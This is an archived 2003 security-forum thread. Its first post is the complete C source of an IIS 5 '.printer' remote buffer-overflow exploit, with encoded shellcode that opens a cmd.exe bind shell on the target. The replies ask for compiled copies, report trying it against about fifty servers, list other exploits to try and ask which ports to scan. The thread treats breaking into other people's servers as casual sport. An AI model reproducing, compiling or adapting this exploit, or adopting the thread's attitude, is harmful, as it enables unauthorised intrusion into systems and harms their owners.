hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > General Network Security
isaiah
Aug 23 2003, 10:16 AM
CODE
/ ********************************************************************************
*/
/*                IIS 5 remote .printer overflow exploit                         */
/*                                                                               */
/*                     by: isno <isno@xfocus.org>                                */
/*                                                                               */
/*     request: GET http://NOPNOP...EIPJmp/null.printer?Shellcode HTTP/1.0       */
/*                                       |______________|                        */
/*                 the shellcode spawns a cmd.exe shell                          */
/*  Usage: iisx <hostname> [iis port] [bind port] [service pack]                 */
/*      hostname  -- the host you want to attack                                 */
/*      iis port  -- the port IIS listened(default is 80)                        */
/*      bind port -- the port you want to connect if succeed(default is 7788)    */
/*      service pack  -- SP remote host installed(0 or 1, default is 0)          */
/*  example: iisx 127.0.0.1 80 2345 0                                            */
/ ********************************************************************************
*/

#include <sys/types.h>
#ifndef WIN32
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#else
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#define snprintf _snprintf
#endif
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#define NOP 0x43  //inc ebx, instead of 0x90

void usage(char *pgm);
int main(int argc, char *argv[])
{
       /* the shellcode searching for KERNEL32.DLL and GetProcAddress  */
       /* then spawns a cmd.exe shell on port 7788, coded by isno      */
       unsigned char shellcode[] =
       "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
       "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
       "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
       "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
       "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
       "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
       "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
       "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
       "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
       "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
       "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
       "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
       "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
       "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
       "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
       "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
       "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
       "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
       "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
       "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
       "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
       "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
       "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
       "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
       "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
       "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
       "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
       "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
       "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
       "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
       "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
       "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
       "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
       "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
       "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
       "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
       "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
       "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
       "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
       "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
       "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
       "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
       "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
       "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
       "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
       "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
       "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
       "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
       "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
       "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
       "\x68\x68\x68\x68";

       int                     i, s;
       int                     sptype = 0;
       unsigned short int      webport = 80;
       unsigned short int      bindport = 7788;
       char request[2048], jmpcode[281], execode[840];
       struct hostent          *ht;
       struct sockaddr_in      sin;

       #ifdef WIN32
       WSADATA WSAData;
       if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
       {
               printf("WSAStartup failed.\n");
               WSACleanup();
               exit(1);
       }
       #endif

       printf("iis5 remote .printer overflow exploit\n");
       printf("      by isno <isno@xfocus.org>    \n\n");

       if(argc < 2 || argc > 5)
       {
       usage(argv[0]);
       }
       if((ht = gethostbyname(argv[1])) == 0)
       {
               printf("Unable to resolve host %s\n",argv[1]);
               exit(1);
       }  
       if(argc > 2)
       {
               webport = atoi(argv[2]);
       }
       sin.sin_port = htons(webport);
       if(argc > 3)
       {
               bindport = htons(atoi(argv[3]));
               bindport^=0x9797;
               shellcode[778]= (bindport) & 0xff;
               shellcode[779]= (bindport >> 8) & 0xff;
       }
       if(argc > 4)
       {
               sptype = atoi(argv[4]);
       }

       for(i = 0; i < 268; i++)
               jmpcode[i] = (char)NOP;
       if(sptype == 0)
       {
               //jmp esp overwrite EIP
               jmpcode[268] = (char)0x4d;
               jmpcode[269] = (char)0x3f;
               jmpcode[270] = (char)0xe3;
               jmpcode[271] = (char)0x77;
       }
       else
       {
               jmpcode[268] = (char)0x8b;
               jmpcode[269] = (char)0x89;
               jmpcode[270] = (char)0xe8;
               jmpcode[271] = (char)0x77;
       }
       jmpcode[272] = (char)0x90;
       jmpcode[273] = (char)0x90;
       jmpcode[274] = (char)0x90;
       jmpcode[275] = (char)0x90;
       //jmp [ebx+0x64], jump to execute shellcode
       jmpcode[276] = (char)0xff;
       jmpcode[277] = (char)0x63;
       jmpcode[278] = (char)0x64;
       jmpcode[279] = (char)0x90;
       jmpcode[280] = (char)0x00;

       for(i = 0; i < 32; i++)
               execode[i] = (char)NOP;
       execode[32]=(char)0x00;
       strcat(execode, shellcode);

       snprintf(request, 2048, "GET http://%s/null.printer?%s HTTP/1.0\r\n\r\n", jmpcode, execode);

       sin.sin_family = AF_INET;
       sin.sin_addr = *((struct in_addr *)ht->h_addr);
       if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
       {
               printf("Unable to set up socket\n");
               exit(1);
       }        
       if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1)
       {
               printf("Unable to connect\n");
               exit(1);
       }
       else
               printf("Connected.\n");
       
       if(send(s, request, strlen(request), 0) == -1)
       {
               printf("Unable to send\n");
               exit(1);
       }
       else
       {
               printf("code sented...\n");
               printf("you may telnet %s %s\n", argv[1], argc>3?argv[3]:"7788");
       }
       #ifdef WIN32
       Sleep(1000);
       #else
       sleep(1);
       #endif
       close(s);
       exit(0);
}      

void usage(char *pgm)
{
       printf("Usage: %s <hostname> [iis port] [bind port] [service pack]\n", pgm);
       printf("    hostname  -- the host you want to attack\n");
       printf("    iis port  -- the port IIS listened(default is 80)\n");
       printf("    bind port -- the port you want to connect if succeed(default is 7788)\n");
       printf("    service pack  -- SP remote host installed(0 or 1, default is 0)\n");
       printf("example: %s 127.0.0.1 80 2345 0\n", pgm);
       exit(1);
}
/*                 www.hack.co.za        [22 June 2001]*/


can anyone compile this i cant im not that experince or if you have it already please tell or if you have better tell please
axl
Aug 23 2003, 04:50 PM
i have compiled it...

but it sucks!!!!

out of about 50 servers-0hacks...

have fun...and please tell me if u had any sucsses...

p.s - the file might be infected with a minor virus-my whole compulter is infected smile.gif

newbie
Aug 23 2003, 07:40 PM
i think ill have the pleasure of compiling it myself
never had a major virus in my life believe it or not...
and so what?
you'll have worse resultes in NTPASS
and SQL well just sux - so slow
i have no exploits for ssh
therse no thinking of normal iis
i've never tryed webdav
im gonna try to compile apache sploit now
cisco is freakin hard
i think iismedia is good... never tryed it
i dunno whats wu-ftp
umm what else
netbios... well netbios is sucky
DCOM r.i.p
ssl im still looking
and still i have no idea wtf did i just say this for...
axl
Aug 23 2003, 07:46 PM
lol

but thanks for info... :-)
h4x0re
Oct 5 2003, 11:06 PM
would it be to much of a problem if someone could please compile this exploit for win32 thanks smile.gif
niko.noname
Oct 8 2003, 08:00 AM
Here the compiled sploit.
Have fun.

DocBullus
Oct 8 2003, 08:21 AM
many thx, i will try the compiled exploits wink.gif
TheDuck
Oct 10 2003, 03:57 AM
10x
but what kind or port to scan? dry.gif
QuadMedic
Oct 10 2003, 05:32 PM
the explit seems ok,let's try it out m8 smile.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.